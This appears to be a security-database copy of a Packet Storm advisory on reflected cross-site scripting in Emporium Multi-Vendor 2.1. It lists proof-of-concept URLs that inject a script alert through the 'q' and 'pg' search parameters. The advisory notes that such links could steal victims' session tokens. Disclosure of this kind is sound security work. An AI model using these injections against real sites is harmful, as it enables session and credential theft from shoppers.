Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCraCkErPACKETSTORM:172088
HistoryMay 02, 2023 - 12:00 a.m.

Emporium Multi-Vendor 2.1 Cross Site Scripting

2023-05-0200:00:00
CraCkEr
packetstormsecurity.com
165
emporium multi-vendor
cross site scripting
reflected xss
content manipulation
vulnerability
JSON
`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : mybizcms.com │  
│ Vendor : MyBizCMS │  
│ Software : Emporium Multi-Vendor 2.1 - eCommerce Marketplace Platform CMS │  
│ Vuln Type: Reflected XSS │  
│ Method : GET │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
Path: /search  
  
GET parameter 'q' is vulnerable to RXSS  
  
https://website/search?q=nyqm1%22%3e%3cscript%3ealert(1)%3c%2fscript%3erw4xg&pg=8  
  
GET parameter 'pg' is vulnerable to RXSS  
  
https://website/search?q=&pg=8ej3m8%3cscript%3ealert(1)%3c%2fscript%3ezxubp  
  
  
[-] Done  
`
JSON